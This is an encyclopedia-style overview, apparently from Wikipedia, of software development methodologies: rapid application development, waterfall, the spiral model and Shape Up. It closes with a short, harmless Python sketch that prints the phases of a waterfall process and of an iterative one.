Rapid application development (RAD) is a software development methodology which favors iterative development and the rapid construction of prototypes instead of large amounts of up-front planning. The "planning" of software developed using RAD is interleaved with writing the software itself. The lack of extensive pre-planning generally allows software to be written much faster and makes it easier to change requirements.

The rapid development process starts with the development of preliminary data models and business process models using structured techniques. In the next stage, requirements are verified using prototyping, eventually to refine the data and process models. These stages are repeated iteratively; further development results in "a combined business requirements and technical design statement to be used for constructing new systems".[6]

The term was first used to describe a software development process introduced by James Martin in 1991. According to Whitten (2003), it is a merger of various structured techniques, especially data-driven information technology engineering, with prototyping techniques to accelerate software systems development.[6] The basic principles of rapid application development are:[1]

The waterfall model is a sequential development approach, in which development is seen as flowing steadily downwards (like a waterfall) through several phases, typically:

The first formal description of the method is often cited as an article published by Winston W. Royce[7] in 1970, although Royce did not use the term "waterfall" in this article. Royce presented this model as an example of a flawed, non-working model.[8] The basic principles are:[1]

The waterfall model is a traditional engineering approach applied to software engineering. A strict waterfall approach discourages revisiting and revising any prior phase once it is complete. This inflexibility in a pure waterfall model has been a source of criticism by supporters of other, more flexible models. It has been widely blamed for several large-scale government projects running over budget, over time, and sometimes failing to deliver on requirements due to the big design up front approach. Except when contractually required, the waterfall model has been largely superseded by more flexible and versatile methodologies developed specifically for software development. See Criticism of waterfall model. A minimal sketch contrasting a single sequential pass with an iterative loop appears at the end of this section.

In 1988, Barry Boehm published a formal software system development "spiral model", which combines some key aspects of the waterfall model and rapid prototyping methodologies in an effort to combine advantages of top-down and bottom-up concepts. It placed emphasis on a key area many felt had been neglected by other methodologies: deliberate iterative risk analysis, particularly suited to large-scale complex systems. The basic principles are:[1]

Shape Up is a software development approach introduced by Basecamp in 2018. It is a set of principles and techniques that Basecamp developed internally to overcome the problem of projects dragging on with no clear end. Its primary target audience is remote teams.
Shape Up has no estimation and velocity tracking, backlogs, or sprints, unlike waterfall, agile, or scrum. Instead, those concepts are replaced with appetite, betting, and cycles. As of 2022, besides Basecamp, notable organizations that have adopted Shape Up include UserVoice and Block.[12][13]

Other high-level software project methodologies include:

Some "process models" are abstract descriptions for evaluating, comparing, and improving the specific process adopted by an organization.
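To make the structural difference between the linear and iterative families discussed above concrete, the following sketch contrasts a single waterfall-style pass through fixed phases with an incremental loop. It is purely illustrative: the phase names and the notion of an "increment" are simplifications for demonstration, not a formal process model.

```python
# Purely illustrative contrast between a single sequential (waterfall-style)
# pass through fixed phases and an iterative/incremental loop. Phase names
# and the "increment" count are assumptions made for this sketch.
PHASES = ["requirements", "design", "implementation", "verification", "maintenance"]

def waterfall(project: str) -> None:
    # Each phase is completed once, in order; earlier phases are not revisited.
    for phase in PHASES:
        print(f"[waterfall] {project}: completing {phase}")

def iterative(project: str, increments: int) -> None:
    # The same activities are repeated per increment, so feedback from one
    # cycle can reshape the requirements and design of the next.
    for i in range(1, increments + 1):
        for phase in PHASES[:-1]:          # maintenance follows after release
            print(f"[iteration {i}] {project}: revisiting {phase}")
        print(f"[iteration {i}] {project}: delivering working increment")

if __name__ == "__main__":
    waterfall("billing system")
    iterative("billing system", increments=3)
```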
https://en.wikipedia.org/wiki/Software_development_process